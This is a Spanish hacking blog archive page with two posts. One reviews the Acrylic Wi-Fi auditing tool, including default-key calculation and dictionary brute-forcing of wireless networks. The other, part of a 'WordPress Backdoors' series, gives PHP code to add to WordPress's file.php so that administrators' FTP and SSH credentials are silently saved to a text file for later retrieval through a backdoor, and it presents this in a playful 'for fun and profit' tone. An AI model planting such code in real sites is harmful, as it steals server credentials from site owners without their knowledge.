miércoles, 16 de abril de 2014

Acrylic Wi-Fi, auditoría wireless en Windows

 Durante la #Rooted2013 del año pasado hubo una interesante charla sobre redes wireless que me llamó la atención. En ella se trataron dos temas principalmente, el primero mostraba al mundo una metodología abierta para el análisis de redes inalámbricas llamada OWISAM, mientras que el segundo presentaba Acrilyc Wi-Fi, una  herramienta para auditar este tipo de redes y es la que ocupará la siguiente entrada (en su versión FREE).


  Antes de trabajar con ella habrá que descargarla desde su web, estando disponible en versión de 32 y 64 bits:
https://www.acrylicwifi.com/acrylic-wifi-gratuito/
 


  Siendo Windows, la instalación es pulsar siguiente, siguiente, siguiente, vendo mi alma al diablo, siguiente, siguiente, acepto instalar el driver, siguiente, siguiente y finalizar. Con todo esto ya tenemos la aplicación instalada y podemos probar su funcionamiento:


  A la izquierda vemos el menú con las distintas posibilidades de la aplicación  mientras que en la esquina superior derecha vemos los controles básicos así como el selector de interfaz de red.

 La primera posibilidad que nos ofrece Acrylic es ver la información sobre las redes que hay al alcance. Se nos muestra gran cantidad de datos de éstas como son su intensidad de señal, canal, SSID, MAC y fabricante, cifrado, wps o marcas temporales. Si una red nos interesa podemos añadirla "al inventario" para almacenarla y analizarla en posteriores ocasiones.

En esta ventana encontramos uno de los puntos fuertes, la columna "password". La aplicación lleva varios scripts con algoritmos para calcular las claves por defecto de determinados puntos de acceso y de de haberlas, ocuparán dicha columna.

Un par de capturas de esta sección:



 Si la clave no aparece calculada en la aplicación existe la posibilidad de realizar ataques de fuerza bruta a la red. Basta con seleccionar con el botón derecho la red y añadirla al modulo Conectivity. Aquí, previa selección de diccionario, podremos lanzar el ataque viendo en la parte inferior (pestaña Conectivity) los resultados.




  El siguiente elemento del menú es un sniffer de paquetes que permite capturar tráfico para posteriormente analizarlo y si queremos, almacenarlo en archivos pcap.


  La tercera entrada permite utilizar la localización mediante GPS para las capturas, pero debido a que no tengo ningún cachivache para hacer las pruebas no he podido trastear con ella, aún así, aquí tenéis la captura que siempre rellena post:


La cuarta es el "almacen de puntos de acceso" guardados que he comentado antes y no tiene más misterio. El punto que le sigue, Scripting, posee los scripts para calcular las claves por defecto de determinados puntos de acceso. Además se nos permite la posibilidad de modificarlos o añadir los propios siendo otro factor interesante de la aplicación.



Para acabar el análisis, tenemos un panel de opciones que añade la posibilidad de personalizar varios aspectos de Acrylic como pueden ser tasas de refresco, colores y demás configuraciones.



Por último, antes de cerrar el post, para los interesados aquí está el vídeo presentación de la Rooted donde se expone la metodología OWISAM y se presenta esta aplicación:



Nos leemos en "breve" ;)

5 0verl0ad Labs: abril 2014  Durante la #Rooted2013 del año pasado hubo una interesante charla sobre redes wireless que me llamó...

sábado, 5 de abril de 2014

WordPress Backdoors VII: robando credenciales del FTP y el SSH

¡Saludos!

    Ésta es una entrada de relleno, porque vamos a hacer lo mismo que hicimos en la primera entrada (WordPress Login Backdoor) sobre esta serie de backdoors en wordpress, pero esta vez aplicado al robo del FTP y de las claves de SSH.

  Cuando se intenta realizar la actualización, descarga, o cualquier otra actividad que requiera la subida de un fichero al servidor desde la plataforma
WordPress se nos solicita los credenciales del FTP a través de un formulario:


   Los parámetros enviados por POST quedan guardados en un array llamado $credentials, situado en el archivo file.php dentro de /wp-admin/includes:



  Al igual que hicimos en el primer post de la saga, debido a que el contenido enviado por POST está en texto plano, podemos leerlo perfectamente. Si recorremos el array guardando en un .txt todos los datos con algo similar a:

$file = fopen("ftp.txt", "w+");
foreach ($credentials as $crede) {
fwrite($file, $crede."\n\n");
}
fclose($file);
Podremos posteriormente leer el archivo generado desde el backdoor que tengamos:


 Free FTP for fun and profit :D


Byt3z!

5 0verl0ad Labs: abril 2014 ¡Saludos!     Ésta es una entrada de relleno, porque vamos a hacer lo mismo que hicimos en la prim...
< >